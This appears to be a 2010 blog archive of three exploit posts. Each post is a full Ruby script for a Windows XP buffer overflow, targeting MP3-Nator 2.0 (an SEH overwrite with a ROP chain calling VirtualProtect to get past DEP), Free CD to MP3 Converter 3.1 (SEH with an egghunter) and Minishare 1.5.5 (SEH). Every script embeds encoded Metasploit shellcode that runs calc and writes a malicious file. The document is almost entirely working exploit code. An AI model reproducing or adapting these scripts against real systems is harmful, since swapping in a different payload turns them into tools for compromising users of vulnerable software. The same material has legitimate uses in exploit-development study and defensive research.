Thursday, November 18, 2010

Exploit Buffer Overflow MP3-Nator (SEH - DEP BYPASS)

# Exploit Title: Exploit Buffer Overflow MP3-Nator (SEH - DEP BYPASS)
# Date: 18-11-2010
# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com
# Credit/Bug Found By: C4SS!0 G0M3S
# Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http://files.brothersoft.com/mp3_audio/players/mp3nator.zip
# Version: 2.0
# Tested on: Windows XP SP3 EN - Latest Update (VMWARE FUSION - Version 3.1.1)
# CVE: N/A
  
#! /usr/bin/env ruby
filename = 'crash.plf'
 
# ./msfpayload windows/exec CMD=calc EXITFUNC=seh R | ./msfencode -e x86/alpha_mixed -b '\x00' -t ruby
# [*] x86/alpha_mixed succeeded with size 456 (iteration=1)
shellcode =
"\x89\xe3\xda\xcf\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x49\x6c\x4d\x38\x4d\x59\x47\x70\x43\x30" +
"\x47\x70\x43\x50\x4e\x69\x48\x65\x50\x31\x48\x52\x43\x54" +
"\x4c\x4b\x51\x42\x46\x50\x4e\x6b\x50\x52\x44\x4c\x4c\x4b" +
"\x50\x52\x46\x74\x4e\x6b\x51\x62\x45\x78\x46\x6f\x4c\x77" +
"\x43\x7a\x47\x56\x50\x31\x49\x6f\x45\x61\x49\x50\x4e\x4c" +
"\x47\x4c\x45\x31\x43\x4c\x47\x72\x44\x6c\x51\x30\x4f\x31" +
"\x48\x4f\x46\x6d\x43\x31\x49\x57\x4b\x52\x4a\x50\x46\x32" +
"\x43\x67\x4c\x4b\x46\x32\x46\x70\x4e\x6b\x43\x72\x47\x4c" +
"\x47\x71\x48\x50\x4c\x4b\x47\x30\x43\x48\x4b\x35\x4b\x70" +
"\x50\x74\x43\x7a\x47\x71\x4e\x30\x42\x70\x4c\x4b\x51\x58" +
"\x42\x38\x4c\x4b\x42\x78\x51\x30\x46\x61\x48\x53\x49\x73" +
"\x47\x4c\x43\x79\x4e\x6b\x44\x74\x4e\x6b\x45\x51\x49\x46" +
"\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c\x4f\x31\x48\x4f" +
"\x46\x6d\x43\x31\x4a\x67\x47\x48\x4d\x30\x50\x75\x48\x74" +
"\x47\x73\x43\x4d\x4a\x58\x45\x6b\x43\x4d\x47\x54\x42\x55" +
"\x4b\x52\x50\x58\x4c\x4b\x50\x58\x45\x74\x47\x71\x4e\x33" +
"\x51\x76\x4e\x6b\x44\x4c\x42\x6b\x4e\x6b\x46\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4e\x6b\x44\x44\x4c\x4b\x46\x61\x4a\x70" +
"\x4f\x79\x50\x44\x44\x64\x44\x64\x51\x4b\x43\x6b\x51\x71" +
"\x43\x69\x50\x5a\x42\x71\x4b\x4f\x4d\x30\x46\x38\x43\x6f" +
"\x50\x5a\x4c\x4b\x47\x62\x48\x6b\x4f\x76\x43\x6d\x43\x5a" +
"\x43\x31\x4c\x4d\x4e\x65\x48\x39\x45\x50\x47\x70\x47\x70" +
"\x46\x30\x42\x48\x46\x51\x4e\x6b\x42\x4f\x4e\x67\x49\x6f" +
"\x4e\x35\x4d\x6b\x4b\x4e\x46\x6e\x44\x72\x4a\x4a\x50\x68" +
"\x4c\x66\x4a\x35\x4f\x4d\x4f\x6d\x4b\x4f\x48\x55\x47\x4c" +
"\x47\x76\x43\x4c\x46\x6a\x4d\x50\x4b\x4b\x4d\x30\x44\x35" +
"\x45\x55\x4f\x4b\x47\x37\x47\x63\x43\x42\x50\x6f\x51\x7a" +
"\x45\x50\x42\x73\x4b\x4f\x49\x45\x45\x33\x43\x51\x50\x6c" +
"\x51\x73\x45\x50\x47\x7a\x41\x41"
 
junk1   =  'A' * 28
 
# ROP1
rop1    =  ''
rop1    << [0x71ABDAC3].pack('V') # PUSH ESP # POP ESI # RETN     [Module : WS2_32.dll]
rop1    << [0x71ABDC56].pack('V')   # MOV EAX,ESI # POP ESI # RETN    [Module : WS2_32.dll]
rop1    << "DEAD"                 # PADDING
rop1    << [0x1001595E].pack('V') # ADD ESP,20 # RETN - xaudio.dll
 
# VIRTUALPROTECT PARAMETERS
params  = ''
params  << [0x7C801AD4].pack('V') # VirtualProtect
params  << 'WWWW'                 # return address [ PARAM #1 ]
params  << 'XXXX'                 # lpAddress      [ PARAM #2 ]
params  << 'YYYY'                 # Size           [ PARAM #3 ]
params  << 'ZZZZ'                 # flNewProtect   [ PARAM #4 ]
params  << [0x5ADA1005].pack('V') # writeable address
params  << 'BEEF' * 2             # PADDING
 
# ROP2 - [ PARAM #1 ]
rop2    =  ''
rop2    << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN     [Module : ole32.dll]
rop2    << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN  [Module : msvcrt.dll]
rop2    << "BEEF"                 # PADDING
rop2    << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN  [Module : msvcrt.dll]
rop2    << 'BEEF'                 # PADDING
rop2    << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN  [Module : RPCRT4.dll]
rop2    << 'BEEF'
 
# ROP2 - [ PARAM #2 ]
rop2    << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN     [Module : ole32.dll]
rop2    << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN  [Module : msvcrt.dll]
rop2    << 'BEEF'                 # PADDING
rop2    << [0x77157D1D].pack('V') * 4 # INC ESI # RETN    [Module : oleaut32.dll]
rop2    << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN  [Module : RPCRT4.dll]
rop2    << 'BEEF'
 
# rop2 - [ PARAM #3 ]
rop2    << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN     [Module : ole32.dll]
rop2    << [0x77E8559E].pack('V') # XOR EAX,EAX # RETN    [Module : RPCRT4.dll]
rop2    << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN  [Module : msvcrt.dll]
rop2    << 'BEEF'                 # PADDING
rop2    << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN  [Module : msvcrt.dll]
rop2    << 'BEEF'                 # PADDING
rop2    << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN  [Module : msvcrt.dll]
rop2    << 'BEEF'                 # PADDING
rop2    << [0x77157D1D].pack('V') * 4 # INC ESI # RETN    [Module : oleaut32.dll]
rop2    << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN  [Module : RPCRT4.dll]
rop2    << 'BEEF'
 
# rop2  - [ PARAM #4 ]
rop2    << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN     [Module : ole32.dll]
rop2    << [0x77E8559E].pack('V') # XOR EAX,EAX # RETN    [Module : RPCRT4.dll]
rop2    << [0x77C4EC1D].pack('V') # ADD EAX,40 # POP EBP # RETN   [Module : msvcrt.dll]
rop2    << 'BEEF'                 # PADDING
rop2    << [0x77157D1D].pack('V') * 4 # INC ESI # RETN    [Module : oleaut32.dll]
rop2    << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN  [Module : RPCRT4.dll]
rop2    << 'BEEF'
 
# POINT ESP TO VIRTUALPROTECT
rop2    << [0x7475B960].pack('V') # XCHG EAX,ESP # RETN   [Module : MSCTF.dll]
nops    = "\x90" * 310
 
junk1   = junk1 + rop1 + params + rop2 + nops + shellcode + 'A' * (4112 - (junk1 + rop1 + params + rop2 + nops + shellcode).length)
 
seh     =  [0x10019C35].pack('V')   # ADD ESP,41C # RETN - xaudio.dll
junk2   =  'C' * (10000 - (junk1 + seh).length)
xploit  = junk1 + seh + junk2
 
File.open(filename,'w') do |fd|
    fd.write xploit
    puts "file size : #{xploit.length.to_s}"
end

Wednesday, November 10, 2010

Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (SEH - EGGHUNTER)

# Exploit Title: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (SEH)
# Date: 10/18/10
# Credit/Bug found by: C4SS!0 G0M3S
# Software Link: http://www.eusing.com/Download/cdtomp3freeware.exe
# Version: 3.1
# Tested on: Windows XP SP3 EN (VMWARE FUSION - Version 3.1.1)
# CVE: N/A

#! /usr/bin/env ruby
filename = 'crash.wav'

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
shellcode = ''
shellcode <<  "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc"
shellcode << "\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
shellcode << "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85"
shellcode << "\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5"
shellcode << "\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c"
shellcode << "\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21"
shellcode << "\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5"
shellcode << "\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27"
shellcode << "\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3"
shellcode << "\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53"
shellcode << "\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f"
shellcode << "\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6"
shellcode << "\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8"
shellcode << "\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
shellcode << "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f"
shellcode << "\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca"

egghunter = ''
egghunter << "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
egghunter << "\x77\x30\x30\x74"
egghunter << "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

junk1    = 'A' * 4156
nseh    = [0x06eb9090].pack('V') # jmp short 6 byte
seh        = [0x00409F8C].pack('V') # cdextract.exe
nops    = "\x90" * 50
junk2    = 'B' * (10000 - (junk1 + nseh + seh + nops + egghunter + nops + "w00tw00t" + shellcode).length)

xploit    = junk1 + nseh + seh + nops + egghunter + nops + "w00tw00t" + shellcode + junk2

File.open(filename,'w') do |fd|
    fd.write xploit
    puts "xploit file size : #{xploit.length.to_s}"
end

Wednesday, November 3, 2010

Minishare 1.5.5 Buffer Overflow Vulnerability (SEH)

# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (SEH)
# Date: 11/03/2010
# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com
# Credit/Bug Found By: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.4.0 - 1.5.5
# Tested on: Windows XP SP3 EN (VMWARE FUSION - Version 3.1.1)
# CVE: N/A

#! /usr/bin/env ruby
filename = 'users.txt'

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
shellcode = ''
shellcode <<  "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc"
shellcode << "\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
shellcode << "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85"
shellcode << "\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5"
shellcode << "\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c"
shellcode << "\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21"
shellcode << "\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5"
shellcode << "\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27"
shellcode << "\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3"
shellcode << "\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53"
shellcode << "\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f"
shellcode << "\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6"
shellcode << "\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8"
shellcode << "\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
shellcode << "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f"
shellcode << "\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca"

nearjmp = "\xe9\x98\xfe\xff\xff" # near jmp 168 bytes
nseh    = [0xfffff9eb].pack('V') # short jmp 7 bytes
seh        = [0x0040B145].pack('V') # ppr

junk1     = "\x90" * (386 - (shellcode + nearjmp).length)
junk2    = 'B' * (1000 - (junk1 + shellcode + nearjmp + nseh + seh).length)

# [nops][ shellcode][near jmp][nseh (short jmp)][seh (pop pop ret)][junk2]
# (3)^                       |  (2)^________^____|                     |(1)
#     |_____________|                      |________________|

xploit = junk1 + shellcode + nearjmp + nseh + seh + junk2

File.open(filename,'w') do |fd|
    fd.write xploit
    puts "file size    : #{xploit.length.to_s}"
end